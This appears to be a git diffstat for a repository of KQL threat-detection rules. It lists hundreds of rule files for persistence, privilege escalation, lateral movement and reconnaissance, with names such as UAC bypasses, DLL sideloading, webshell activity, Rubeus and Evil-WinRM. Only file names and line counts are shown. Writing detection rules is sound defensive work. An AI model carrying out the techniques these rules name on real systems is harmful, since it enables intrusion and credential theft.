.../mmc_spawning_windows_shell.kql | 10 + ...tsc_exe_execution_from_uncommon_parent.kql | 12 + ...rt_forwarding_rule_added_via_netsh_exe.kql | 13 + .../new_portproxy_registry_entry_added.kql | 13 + ...top_connection_initiated_via_mstsc_exe.kql | 14 ++ ...dp_connections_over_non_standard_tools.kql | 14 ++ ...nternetexplorer_application_dll_hijack.kql | 10 + ...orer_application_dll_hijack_image_load.kql | 10 + ...eral_movement_via_activatemicrosoftapp.kql | 11 + ...eral_movement_via_windows_remote_shell.kql | 13 + .../potential_mstsc_shadowing_activity.kql | 10 + .../potential_remote_desktop_tunneling.kql | 10 + ...scalation_via_named_pipe_impersonation.kql | 12 + .../psexec_remote_execution_file_artefact.kql | 12 + ...rt_forwarding_rule_added_via_netsh_exe.kql | 12 + .../rundll32_execution_without_parameters.kql | 12 + .../suspicious_csi_exe_usage.kql | 12 + .../suspicious_rdp_redirect_using_tscon.kql | 10 + .../suspicious_sysaidserver_child.kql | 10 + .../suspicious_ultravnc_execution.kql | 10 + .../windows_admin_share_mount_via_net_exe.kql | 12 + ..._hosted_webdav_share_mount_via_net_exe.kql | 10 + .../windows_share_mount_via_net_exe.kql | 12 + .../winrs_local_command_execution.kql | 14 ++ ...mers_activity_via_scrcons_exe_dll_load.kql | 13 + .../wmiexec_default_output_file.kql | 12 + ...sions_to_hide_services_via_set_service.kql | 12 + ..._windows_security_center_notifications.kql | 10 + ...ugger_entry_to_aedebug_for_persistence.kql | 12 + ...ger_entry_to_hangs_key_for_persistence.kql | 12 + .../add_disallowrun_execution_to_registry.kql | 10 + .../allow_rdp_remote_assistance_feature.kql | 12 + KQL/rules/Persistence/change_the_fax_dll.kql | 10 + ...ccount_associated_with_the_fax_service.kql | 10 + .../chopper_webshell_process_pattern.kql | 10 + ...nstance_executed_with_custom_extension.kql | 12 + .../clickonce_trust_prompt_tampering.kql | 12 + .../Persistence/com_hijack_via_sdclt.kql | 10 + ...nication_to_uncommon_destination_ports.kql | 10 + 
.../crashcontrol_crashdump_disabled.kql | 12 + ..._local_hidden_user_account_by_registry.kql | 10 + .../creation_of_a_local_user_account.kql | 12 + ..._internal_tools_or_feature_in_registry.kql | 12 + ..._windows_security_center_notifications.kql | 10 + ..._hijackig_via_additional_space_in_path.kql | 12 + .../dns_over_https_enabled_by_registry.kql | 15 ++ .../dropping_of_password_filter_dll.kql | 10 + .../Persistence/enable_lm_hash_storage.kql | 12 + .../enable_lm_hash_storage_proccreation.kql | 12 + ...ing_cor_profiler_environment_variables.kql | 10 + .../esxi_account_creation_via_esxcli.kql | 12 + ...mission_assigned_to_account_via_esxcli.kql | 12 + .../etw_logging_disabled_for_rpcrt4_dll.kql | 10 + .../etw_logging_disabled_for_scm.kql | 10 + ...abled_in_net_processes_sysmon_registry.kql | 10 + .../hacktool_powerup_write_hijack_dll.kql | 15 ++ ...acktool_sharpup_privesc_tool_execution.kql | 10 + .../Persistence/ie_change_domain_zone.kql | 12 + ..._code_module_command_line_installation.kql | 12 + .../imports_registry_key_from_a_file.kql | 13 + .../imports_registry_key_from_an_ads.kql | 10 + KQL/rules/Persistence/interactive_at_job.kql | 12 + .../Persistence/linux_webshell_indicators.kql | 12 + .../Persistence/macos_emond_launch_daemon.kql | 12 + ...d_in_a_potentially_suspicious_document.kql | 12 + ...ropped_in_the_teams_or_onedrive_folder.kql | 12 + ...sk_system_power_settings_via_systemctl.kql | 15 ++ .../modification_of_ie_registry_settings.kql | 10 + ...odify_user_shell_folders_startup_value.kql | 10 + .../monitoring_for_persistence_via_bits.kql | 14 ++ ...sexchange_transport_agent_installation.kql | 12 + ...enassemblyusagelog_registry_key_tamper.kql | 13 + .../netntlm_downgrade_attack_registry.kql | 12 + ..._custom_db_path_registry_configuration.kql | 12 + ...custom_vbscript_registry_configuration.kql | 12 + ...ustom_wmi_query_registry_configuration.kql | 12 + .../new_kernel_driver_via_sc_exe.kql | 12 + .../new_odbc_driver_registered.kql | 12 + 
.../new_service_creation_using_powershell.kql | 13 + .../new_service_creation_using_sc_exe.kql | 13 + ...ders_registered_with_uncommon_dll_name.kql | 13 + .../new_user_created_via_net_exe.kql | 13 + ...d_via_net_exe_with_never_expire_option.kql | 12 + ..._privileged_usage_of_reg_or_powershell.kql | 10 + ...office_application_startup_office_test.kql | 12 + .../office_macros_warning_disabled.kql | 12 + ...ientmailrules_setting_enabled_registry.kql | 10 + ...ook_security_settings_updated_registry.kql | 12 + .../path_to_screensaver_binary_modified.kql | 12 + ...tence_via_disk_cleanup_handler_autorun.kql | 16 ++ .../persistence_via_hhctrl_ocx.kql | 12 + .../persistence_via_new_sip_provider.kql | 12 + .../persistence_via_sticky_key_backdoor.kql | 14 ++ ...persistence_via_typedpaths_commandline.kql | 10 + ...scalation_via_weak_service_permissions.kql | 10 + .../potential_appverifui_dll_sideloading.kql | 12 + .../potential_avkkid_dll_sideloading.kql | 10 + .../potential_azure_browser_sso_abuse.kql | 14 ++ ...inary_or_script_dropper_via_powershell.kql | 12 + ...tstrike_service_installations_registry.kql | 13 + .../potential_eacore_dll_sideloading.kql | 12 + .../potential_edputil_dll_sideloading.kql | 12 + .../potential_goopdate_dll_sideloading.kql | 13 + .../potential_iviewers_dll_sideloading.kql | 10 + .../potential_mfdetours_dll_sideloading.kql | 12 + ...rsistence_attempt_via_errorhandler_cmd.kql | 12 + .../potential_persistence_via_autodialdll.kql | 12 + ...tential_persistence_via_chm_helper_dll.kql | 10 + ...ersistence_via_custom_protocol_handler.kql | 12 + ...ence_via_disk_cleanup_handler_registry.kql | 18 ++ ...ential_persistence_via_dllpathoverride.kql | 10 + ...ersistence_via_event_viewer_events_asp.kql | 10 + ..._persistence_via_excel_add_in_registry.kql | 10 + ...tential_persistence_via_lsa_extensions.kql | 14 ++ ...ersistence_via_microsoft_office_add_in.kql | 12 + ...ce_via_microsoft_office_startup_folder.kql | 13 + .../potential_persistence_via_mpnotify.kql | 12 
+ ...rsistence_via_mycomputer_registry_keys.kql | 12 + ...stence_via_new_amsi_providers_registry.kql | 12 + ...ential_persistence_via_notepad_plugins.kql | 13 + ...potential_persistence_via_outlook_form.kql | 12 + .../potential_persistence_via_typedpaths.kql | 12 + ...nce_via_visual_studio_tools_for_office.kql | 12 + ...ation_via_service_permissions_weakness.kql | 10 + .../potential_qakbot_registry_activity.kql | 10 + .../potential_rcdll_dll_sideloading.kql | 10 + ..._dll_sideloading_from_default_location.kql | 10 + ..._sideloading_from_non_default_location.kql | 12 + .../potential_roboform_dll_sideloading.kql | 12 + ...ll_context_menu_scan_command_tampering.kql | 10 + ...otential_shelldispatch_dll_sideloading.kql | 12 + ...m_database_persistence_via_sdbinst_exe.kql | 12 + .../potential_smadhook_dll_sideloading.kql | 12 + ...ential_solidpdfcreator_dll_sideloading.kql | 10 + ...picious_powershell_module_file_created.kql | 12 + ...ous_registry_file_imported_via_reg_exe.kql | 12 + ..._rdp_related_registry_keys_via_reg_exe.kql | 10 + .../potential_vivaldi_elf_dll_sideloading.kql | 10 + .../potential_waveedit_dll_sideloading.kql | 12 + ...al_webshell_creation_on_static_website.kql | 12 + .../potential_wwlib_dll_sideloading.kql | 10 + ...ious_child_process_of_keyscrambler_exe.kql | 10 + ...esktop_background_change_using_reg_exe.kql | 14 ++ ...desktop_background_change_via_registry.kql | 14 ++ ...picious_malware_callback_communication.kql | 11 + ...s_malware_callback_communication_linux.kql | 11 + ...hell_script_creation_in_profile_folder.kql | 13 + .../powershell_module_file_created.kql | 12 + ...file_created_by_non_powershell_process.kql | 10 + .../powershell_profile_modification.kql | 12 + ...hell_script_dropped_via_powershell_exe.kql | 12 + ...er_creation_by_non_sysinternals_binary.kql | 14 ++ ...er_creation_by_non_sysinternals_binary.kql | 12 + .../pua_system_informer_execution.kql | 12 + ..._winnti_playbook_registry_manipulation.kql | 10 + 
.../Persistence/reg_add_suspicious_paths.kql | 12 + .../register_new_ifiltre_for_persistence.kql | 14 ++ .../registry_explorer_policy_modification.kql | 12 + .../registry_hide_function_from_user.kql | 12 + ...gistry_manipulation_via_wmi_stdregprov.kql | 15 ++ ..._modification_to_hidden_file_extension.kql | 12 + .../registry_modification_via_regini_exe.kql | 12 + ...ccess_tool_anydesk_incoming_connection.kql | 13 + ...l_screenconnect_installation_execution.kql | 12 + ...m_viewer_session_started_on_linux_host.kql | 14 ++ ...m_viewer_session_started_on_macos_host.kql | 14 ++ ...viewer_session_started_on_windows_host.kql | 14 ++ ..._potential_com_hijacking_registry_keys.kql | 14 ++ ...ctedadminmode_registry_value_tampering.kql | 13 + ..._registry_value_tampering_proccreation.kql | 13 + ...un_once_task_configuration_in_registry.kql | 12 + ...sk_execution_as_configured_in_registry.kql | 10 + ...sabled_via_minint_registry_key_process.kql | 15 ++ ...d_via_minint_registry_key_registry_set.kql | 15 ++ .../service_binary_in_suspicious_folder.kql | 10 + ...dacl_abuse_to_hide_services_via_sc_exe.kql | 10 + ...curity_descriptor_tampering_via_sc_exe.kql | 10 + KQL/rules/Persistence/servicedll_hijack.kql | 15 ++ .../shell_open_registry_keys_manipulation.kql | 10 + KQL/rules/Persistence/shimcache_flush.kql | 10 + .../startup_item_file_created_macos.kql | 15 ++ .../suspicious_aspx_file_drop_by_exchange.kql | 10 + ...nstance_executed_with_custom_extension.kql | 10 + ...spicious_debugger_registration_cmdline.kql | 10 + ..._activity_from_fake_recycle_bin_folder.kql | 10 + .../suspicious_file_drop_by_exchange.kql | 10 + ...s_file_write_to_webapps_root_directory.kql | 12 + .../suspicious_iis_module_registration.kql | 12 + .../suspicious_new_service_creation.kql | 12 + ...ious_printer_driver_empty_manufacturer.kql | 12 + ...spicious_process_by_web_server_process.kql | 13 + ...execution_from_fake_recycle_bin_folder.kql | 12 + ...y_modification_from_ads_via_regini_exe.kql | 10 + 
...uspicious_screensave_change_by_reg_exe.kql | 14 ++ .../suspicious_service_path_modification.kql | 12 + .../suspicious_vboxdrvinst_exe_parameters.kql | 15 ++ ...nt_connection_history_cleared_registry.kql | 10 + ...rust_access_disable_for_vbapplications.kql | 12 + ..._bypass_via_windows_directory_spoofing.kql | 14 ++ .../Persistence/uac_bypass_with_fake_dll.kql | 12 + ...fi_persistence_via_wpbbin_filecreation.kql | 12 + ...persistence_via_wpbbin_processcreation.kql | 12 + ..._database_installation_via_sdbinst_exe.kql | 12 + ...icrosoft_office_trusted_location_added.kql | 12 + ...allation_attempt_using_add_appxpackage.kql | 12 + .../unusual_child_process_of_dns_exe.kql | 10 + .../unusual_file_deletion_by_dns_exe.kql | 10 + .../unusual_file_modification_by_dns_exe.kql | 10 + .../user_added_to_admin_group_via_dscl.kql | 12 + ...r_added_to_admin_group_via_dseditgroup.kql | 12 + ...r_added_to_admin_group_via_sysadminctl.kql | 12 + ...vscode_powershell_profile_modification.kql | 12 + ...digest_credguard_registry_modification.kql | 13 + .../wdigest_enable_uselogoncredential.kql | 10 + ...l_detection_with_command_line_keywords.kql | 10 + .../webshell_hacking_activity_patterns.kql | 13 + .../webshell_tool_reconnaissance_activity.kql | 11 + ...inlogon_allowmultipletssessions_enable.kql | 15 ++ .../wmi_persistence_script_event_consumer.kql | 13 + .../Persistence/wmi_persistence_security.kql | 12 + ...d_port_monitor_persistence_in_registry.kql | 12 + ...curity_descriptor_tampering_via_sc_exe.kql | 10 + .../atbroker_registry_change.kql | 12 + .../bypass_uac_using_delegateexecute.kql | 10 + .../bypass_uac_using_event_viewer.kql | 10 + .../bypass_uac_using_silentcleanup_task.kql | 13 + .../bypass_uac_via_cmstp.kql | 12 + .../bypass_uac_via_wsreset_exe.kql | 12 + ...le_association_to_executable_via_assoc.kql | 12 + ...nge_default_file_association_via_assoc.kql | 14 ++ ...ng_service_imagepath_value_via_reg_exe.kql | 13 + .../classes_autorun_keys_modification.kql | 13 + 
.../com_hijacking_via_treatas.kql | 12 + ..._of_default_system_clsid_default_value.kql | 12 + .../common_autorun_keys_modification.kql | 13 + .../control_panel_items.kql | 10 + ...created_files_by_microsoft_sync_center.kql | 10 + ...ion_exe_for_service_with_unquoted_path.kql | 12 + ...werfault_exe_wer_dll_in_unusual_folder.kql | 10 + ...ntcontrolset_autorun_keys_modification.kql | 13 + ...rrentversion_autorun_keys_modification.kql | 13 + ...ntversion_nt_autorun_keys_modification.kql | 13 + ..._rdp_port_changed_to_non_standard_port.kql | 13 + ...curity_descriptor_tampering_via_sc_exe.kql | 10 + .../dhcp_callout_dll_installation.kql | 10 + .../direct_autorun_keys_modification.kql | 14 ++ ...execution_via_register_cimprovider_exe.kql | 10 + .../dll_load_via_lsass.kql | 10 + ...dll_sideloading_by_vmware_xfer_utility.kql | 12 + .../dllhost_exe_execution_anomaly.kql | 12 + .../explorer_nouaccheck_flag.kql | 13 + .../fax_service_dll_search_order_hijack.kql | 12 + ...on_in_suspicious_directory_by_msdt_exe.kql | 10 + .../guest_account_enabled_via_sysadminctl.kql | 10 + ...cktool_crackmapexec_execution_patterns.kql | 10 + ..._dinjector_powershell_cradle_execution.kql | 12 + .../hacktool_hollowreaper_execution.kql | 12 + .../hacktool_impersonate_execution.kql | 10 + .../hacktool_sharpdpapi_execution.kql | 12 + .../hacktool_sharpersist_execution.kql | 10 + .../hacktool_sharpimpersonation_execution.kql | 10 + .../hacktool_winpeas_execution.kql | 12 + ...or_privilege_escalation_tool_execution.kql | 12 + ...net_explorer_autorun_keys_modification.kql | 13 + ...h_agent_daemon_execution_via_launchctl.kql | 12 + .../linux_sudo_chroot_execution.kql | 16 ++ ..._center_suspicious_network_connections.kql | 10 + .../narrator_s_feedback_hub_persistence.kql | 10 + ...k_connection_initiated_via_notepad_exe.kql | 15 ++ ...ripteventconsumer_created_via_wmic_exe.kql | 12 + .../new_custom_shim_database_created.kql | 14 ++ ...new_dns_serverlevelplugindll_installed.kql | 10 + 
...evelplugindll_installed_via_dnscmd_exe.kql | 10 + ..._registered_from_a_suspicious_location.kql | 11 + .../new_outlook_macro_created.kql | 12 + ..._run_key_pointing_to_suspicious_folder.kql | 12 + .../office_autorun_keys_modification.kql | 13 + ...cution_without_warning_setting_enabled.kql | 12 + .../password_set_to_never_expire_via_wmi.kql | 13 + .../persistence_via_cron_files.kql | 12 + .../persistence_via_sudoers_files.kql | 12 + ..._hijacking_via_treatas_subkey_registry.kql | 12 + ...jection_or_execution_using_tracker_exe.kql | 10 + ...ential_dll_sideloading_of_dbgmodel_dll.kql | 12 + ...potential_dll_sideloading_of_mpsvc_dll.kql | 12 + ...ential_dll_sideloading_of_mscorsvc_dll.kql | 12 + ...tial_dll_sideloading_using_coregen_exe.kql | 10 + ...dll_sideloading_via_deviceenroller_exe.kql | 12 + ...ential_dll_sideloading_via_vmware_xfer.kql | 12 + ..._access_via_dll_search_order_hijacking.kql | 10 + ..._process_code_injection_via_dd_utility.kql | 10 + .../potential_mpclient_dll_sideloading.kql | 12 + ..._dll_sideloading_via_defender_binaries.kql | 12 + ...attempt_via_existing_service_tampering.kql | 10 + ...nce_attempt_via_run_keys_using_reg_exe.kql | 14 ++ .../potential_persistence_using_debugpath.kql | 10 + ...istence_via_app_paths_default_property.kql | 16 ++ ...via_appcompat_registerapprestart_layer.kql | 15 ++ .../potential_persistence_via_globalflags.kql | 10 + ...sistence_via_logon_scripts_commandline.kql | 12 + ...persistence_via_logon_scripts_registry.kql | 12 + ..._via_microsoft_compatibility_appraiser.kql | 12 + ...ntial_persistence_via_netsh_helper_dll.kql | 11 + ...sistence_via_netsh_helper_dll_registry.kql | 13 + ...utlook_loadmacroprovideronboot_setting.kql | 10 + .../potential_persistence_via_plistbuddy.kql | 10 + ...powershell_search_order_hijacking_task.kql | 10 + ...rsistence_via_scrobj_dll_com_hijacking.kql | 12 + ...via_shim_database_in_uncommon_location.kql | 10 + ...istence_via_shim_database_modification.kql | 14 ++ 
...tion_using_symlink_between_osk_and_cmd.kql | 10 + ...tential_process_injection_via_msra_exe.kql | 12 + ...otential_psfactorybuffer_com_hijacking.kql | 10 + ...istence_attempt_via_dbgmanageddebugger.kql | 12 + ...sistence_attempt_via_windows_telemetry.kql | 14 ++ ...ential_ripzip_attack_on_startup_folder.kql | 13 + ...istence_install_using_a_scheduled_task.kql | 10 + ...hortcut_persistence_via_powershell_exe.kql | 16 ++ .../potential_uac_bypass_via_sdclt_exe.kql | 10 + ...ll_web_access_feature_enabled_via_dism.kql | 12 + ...istry_persistence_via_explorer_run_key.kql | 10 + ..._dll_execution_with_uncommon_extension.kql | 12 + .../renamed_vmnat_exe_execution.kql | 10 + .../root_account_enable_via_dsenableroot.kql | 10 + .../rundll32_registered_com_objects.kql | 12 + ...ially_suspicious_path_via_schtasks_exe.kql | 13 + ...ation_masquerading_as_system_processes.kql | 12 + ...th_curl_and_powershell_execution_combo.kql | 15 ++ ...xecuting_encoded_payload_from_registry.kql | 12 + ...d_task_executing_payload_from_registry.kql | 10 + .../scheduled_task_job_at.kql | 14 ++ ...d_taskcache_change_by_uncommon_program.kql | 10 + ...or_modification_with_system_privileges.kql | 10 + .../schtasks_from_suspicious_folders.kql | 10 + ..._privileges_enumeration_via_whoami_exe.kql | 10 + ...rovider_ssp_added_to_lsa_configuration.kql | 11 + ...sion_manager_autorun_keys_modification.kql | 13 + ...p16_exe_execution_with_custom_lst_file.kql | 15 ++ .../startup_folder_file_write.kql | 12 + .../sticky_key_like_backdoor_execution.kql | 12 + ...ticky_key_like_backdoor_usage_registry.kql | 12 + ...ious_autorun_registry_modified_via_wmi.kql | 13 + ...nd_patterns_in_scheduled_task_creation.kql | 12 + .../suspicious_desktop_ini_action.kql | 13 + ...spicious_driver_install_by_pnputil_exe.kql | 14 ++ .../suspicious_get_variable_exe_creation.kql | 13 + .../suspicious_grpconv_execution.kql | 10 + .../suspicious_gup_usage.kql | 12 + ...icious_modification_of_scheduled_tasks.kql | 13 + 
...ication_on_the_printer_spooler_service.kql | 10 + .../suspicious_outlook_macro_created.kql | 12 + ...icious_powershell_in_registry_run_keys.kql | 12 + .../suspicious_run_key_from_download.kql | 12 + ...suspicious_runas_like_flag_combination.kql | 10 + ...ious_rundll32_invoking_inline_vbscript.kql | 10 + ...ed_task_creation_involving_temp_folder.kql | 13 + ...task_creation_via_masqueraded_xml_file.kql | 10 + ...suspicious_scheduled_task_name_as_guid.kql | 12 + ...scheduled_task_write_to_system32_tasks.kql | 10 + ...ious_schtasks_execution_appdata_folder.kql | 10 + ...sks_schedule_type_with_high_privileges.kql | 12 + .../suspicious_schtasks_schedule_types.kql | 12 + ...cious_screensaver_binary_file_creation.kql | 12 + ...cl_modification_via_set_service_cmdlet.kql | 10 + ...icious_shim_database_patching_activity.kql | 10 + .../suspicious_startup_folder_persistence.kql | 15 ++ .../suspicious_userinit_child_process.kql | 12 + .../sysinternals_psservice_execution.kql | 12 + .../sysinternals_pssuspend_execution.kql | 10 + ...stem_scripts_autorun_keys_modification.kql | 13 + .../tasks_folder_evasion.kql | 13 + ...cross_ebpf_rootkit_default_persistence.kql | 12 + .../trustedpath_uac_bypass_pattern.kql | 10 + .../Privilege Escalation/uac_disabled.kql | 11 + .../uac_notification_disabled.kql | 13 + .../uac_secure_desktop_prompt_disabled.kql | 13 + .../uncommon_userinit_child_process.kql | 12 + .../user_added_to_highly_privileged_group.kql | 12 + ...er_added_to_local_administrators_group.kql | 12 + ...ed_to_root_sudoers_group_using_usermod.kql | 12 + .../using_settingsynchost_exe_as_lolbin.kql | 10 + .../vbscript_payload_stored_in_registry.kql | 10 + ..._exe_execution_from_privileged_process.kql | 10 + ...vent_log_access_tampering_via_registry.kql | 13 + ...tings_modification_by_uncommon_process.kql | 12 + .../winekey_registry_modification.kql | 10 + .../winlogon_notify_key_logon_persistence.kql | 12 + ...ar_creating_files_in_startup_locations.kql | 12 + 
.../winsock2_autorun_keys_modification.kql | 13 + .../wmi_backdoor_exchange_transport_agent.kql | 10 + ...ersistence_command_line_event_consumer.kql | 12 + ...tence_script_event_consumer_file_write.kql | 12 + ...node_classes_autorun_keys_modification.kql | 13 + ...rrentversion_autorun_keys_modification.kql | 13 + ...rrentversion_autorun_keys_modification.kql | 13 + .../writing_local_admin_share.kql | 12 + ...xe_execution_from_non_default_location.kql | 14 ++ .../access_of_sudoers_file_content.kql | 12 + .../Reconnaissance/linux_recon_indicators.kql | 12 + ...umeration_using_ad_module_proccreation.kql | 12 + .../print_history_file_contents.kql | 12 + .../pua_pingcastle_execution.kql | 10 + ...ion_from_potentially_suspicious_parent.kql | 11 + .../Reconnaissance/suspicious_git_clone.kql | 10 + .../suspicious_git_clone_linux.kql | 10 + .../creation_of_a_diagcab.kql | 12 + .../hacktool_purplesharp_execution.kql | 12 + ...nmanager_service_installation_registry.kql | 10 + ...ential_execution_of_sysinternals_tools.kql | 13 + ...l_privilege_escalation_to_local_system.kql | 13 + .../potential_psexec_remote_execution.kql | 10 + ...exec_paexec_escalation_to_local_system.kql | 13 + .../pua_csexec_execution.kql | 10 + ...ua_sysinternal_tool_execution_registry.kql | 13 + ..._sysinternals_tools_execution_registry.kql | 12 + ...named_sysinternals_debugview_execution.kql | 10 + ...of_renamed_sysinternals_tools_registry.kql | 12 + .../suspicious_keyboard_layout_load.kql | 12 + ..._file_created_in_office_startup_folder.kql | 12 + ...renamed_sysinternals_tools_registryset.kql | 12 + .../vhd_image_download_via_browser.kql | 14 ++ ...rom_Or_To_Admin_Share_Or_Sysvol_Folder.kql | 7 - .../HackTool_-_KrbRelayUp_Execution.kql | 7 - ...ial_Impacket_Lateral_Movement_Activity.kql | 7 - .../HackTool_-_Rubeus_Execution.kql | 7 - .../HackTool_-_SharpMove_Tool_Execution.kql | 8 - ...HackTool_-_WinRM_Access_Via_Evil-WinRM.kql | 7 - ...l_-_Wmiexec_Default_Powershell_Command.kql | 7 - 
.../MMC_Spawning_Windows_Shell.kql | 7 - ...tsc.EXE_Execution_From_Uncommon_Parent.kql | 7 - .../New_PortProxy_Registry_Entry_Added.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - ...top_Connection_Initiated_Via_Mstsc.EXE.kql | 9 - ...DP_Connections_Over_Non-Standard_Tools.kql | 9 - ...oy_Remote_Adminstartion_Tool_Execution.kql | 7 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - .../PUA_-_Radmin_Viewer_Utility_Execution.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Port_Forwarding_Activity_Via_SSH.EXE.kql | 7 - ...trike_Service_Installations_-_Registry.kql | 8 - ...nternetExplorer.Application_DLL_Hijack.kql | 7 - ...er.Application_DLL_Hijack_-_Image_Load.kql | 7 - ...eral_Movement_Via_ActivateMicrosoftApp.kql | 8 - .../Potential_MSTSC_Shadowing_Activity.kql | 7 - ...rsistence_Via_Logon_Scripts_-_Registry.kql | 7 - .../Potential_Remote_Desktop_Tunneling.kql | 7 - ..._RDP_Related_Registry_Keys_Via_Reg.EXE.kql | 7 - ...scalation_via_Named_Pipe_Impersonation.kql | 7 - .../RDP_Over_Reverse_SSH_Tunnel.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - .../Rundll32_Execution_Without_Parameters.kql | 7 - .../Suspicious_Plink_Port_Forwarding.kql | 7 - .../Suspicious_RDP_Redirect_Using_TSCON.kql | 7 - .../Suspicious_SysAidServer_Child.kql | 7 - .../Suspicious_UltraVNC_Execution.kql | 7 - .../Suspicious_WSMAN_Provider_Image_Loads.kql | 7 - .../Terminal_Service_Process_Spawn.kql | 7 - .../Uncommon_Outbound_Kerberos_Connection.kql | 8 - ...er_Added_to_Remote_Desktop_Users_Group.kql | 7 - ...mers_Activity_Via_Scrcons.EXE_DLL_Load.kql | 7 - .../Windows_Admin_Share_Mount_Via_Net.EXE.kql | 7 - ..._Hosted_WebDav_Share_Mount_Via_Net.EXE.kql | 7 - .../Windows_Share_Mount_Via_Net.EXE.kql | 7 - .../Wmiexec_Default_Output_File.kql | 7 - .../Wmiprvse_Wbemcomn_DLL_Hijack.kql | 7 - .../Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql | 7 - .../Writing_Local_Admin_Share.kql | 9 - ...sions_to_Hide_Services_Via_Set-Service.kql | 7 - 
...ugger_Entry_To_AeDebug_For_Persistence.kql | 7 - ...ger_Entry_To_Hangs_Key_For_Persistence.kql | 7 - ...d_Port_Monitor_Persistence_in_Registry.kql | 9 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - ...work_Service_Potential_DLL_Sideloading.kql | 7 - Persistence/Atbroker_Registry_Change.kql | 7 - Persistence/Bypass_UAC_Using_Event_Viewer.kql | 7 - Persistence/COM_Hijacking_via_TreatAs.kql | 7 - ...le_Association_To_Executable_Via_Assoc.kql | 9 - ...nge_Default_File_Association_Via_Assoc.kql | 9 - ...ng_Service_ImagePath_Value_Via_Reg.EXE.kql | 10 - .../Chopper_Webshell_Process_Pattern.kql | 7 - ...nstance_Executed_With_Custom_Extension.kql | 7 - .../Classes_Autorun_Keys_Modification.kql | 7 - .../Common_Autorun_Keys_Modification.kql | 7 - Persistence/Control_Panel_Items.kql | 7 - ...ion_Exe_for_Service_with_Unquoted_Path.kql | 9 - .../Creation_Of_Non-Existent_System_DLL.kql | 9 - ..._Local_Hidden_User_Account_by_Registry.kql | 7 - ...n_of_an_WerFault.exe_in_Unusual_Folder.kql | 7 - ...ntControlSet_Autorun_Keys_Modification.kql | 7 - ...rrentVersion_Autorun_Keys_Modification.kql | 7 - ...ntVersion_NT_Autorun_Keys_Modification.kql | 7 - Persistence/DLL_Load_via_LSASS.kql | 7 - ..._Hijackig_Via_Additional_Space_in_Path.kql | 9 - .../DLL_Sideloading_Of_ShellChromeAPI.DLL.kql | 9 - ..._RDP_Port_Changed_to_Non_Standard_Port.kql | 10 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - .../Direct_Autorun_Keys_Modification.kql | 7 - ...ocal_Manifest_Installation_With_Winget.kql | 7 - ...ing_COR_Profiler_Environment_Variables.kql | 7 - .../Fax_Service_DLL_Search_Order_Hijack.kql | 7 - ...on_In_Suspicious_Directory_By_Msdt.EXE.kql | 7 - Persistence/File_Download_Via_Bitsadmin.kql | 7 - ...itsadmin_To_A_Suspicious_Target_Folder.kql | 7 - ...Bitsadmin_To_An_Uncommon_Target_Folder.kql | 7 - ...ous_Extension_Downloaded_Via_Bitsadmin.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - .../HackTool_-_SharPersist_Execution.kql | 7 - 
Persistence/IE_Change_Domain_Zone.kql | 7 - ...-Code_Module_Command_Line_Installation.kql | 7 - ...net_Explorer_Autorun_Keys_Modification.kql | 7 - .../Leviathan_Registry_Key_Activity.kql | 7 - ...SExchange_Transport_Agent_Installation.kql | 7 - ...ropped_in_the_Teams_or_OneDrive_Folder.kql | 9 - Persistence/Microsoft_Office_DLL_Sideload.kql | 7 - ...odify_User_Shell_Folders_Startup_Value.kql | 7 - .../Narrator_s_Feedback-Hub_Persistence.kql | 7 - ...riptEventConsumer_Created_Via_Wmic.EXE.kql | 7 - .../New_Custom_Shim_Database_Created.kql | 9 - Persistence/New_Kernel_Driver_Via_SC.EXE.kql | 7 - ..._Registered_From_A_Suspicious_Location.kql | 8 - Persistence/New_ODBC_Driver_Registered.kql | 7 - Persistence/New_Outlook_Macro_Created.kql | 7 - ..._RUN_Key_Pointing_to_Suspicious_Folder.kql | 7 - .../New_Service_Creation_Using_PowerShell.kql | 7 - .../New_Service_Creation_Using_Sc.EXE.kql | 7 - ...ders_Registered_With_Uncommon_DLL_Name.kql | 10 - Persistence/New_User_Created_Via_Net.EXE.kql | 7 - ...d_Via_Net.EXE_With_Never_Expire_Option.kql | 7 - ...fice_Application_Startup_-_Office_Test.kql | 7 - .../Office_Autorun_Keys_Modification.kql | 7 - .../OilRig_APT_Registry_Persistence.kql | 7 - ...cution_Without_Warning_Setting_Enabled.kql | 7 - ...k_Security_Settings_Updated_-_Registry.kql | 7 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Path_To_Screensaver_Binary_Modified.kql | 7 - ...nce_Via_Disk_Cleanup_Handler_-_Autorun.kql | 13 - Persistence/Persistence_Via_Hhctrl.ocx.kql | 7 - .../Persistence_Via_New_SIP_Provider.kql | 7 - ...rsistence_Via_TypedPaths_-_CommandLine.kql | 7 - ...scalation_via_Weak_Service_Permissions.kql | 7 - Persistence/Potential_7za.DLL_Sideloading.kql | 7 - .../Potential_Amazon_SSM_Agent_Hijacking.kql | 7 - ...ial_Antivirus_Software_DLL_Sideloading.kql | 7 - ...inary_Or_Script_Dropper_Via_PowerShell.kql | 7 - .../Potential_CCleanerDU.DLL_Sideloading.kql | 7 - 
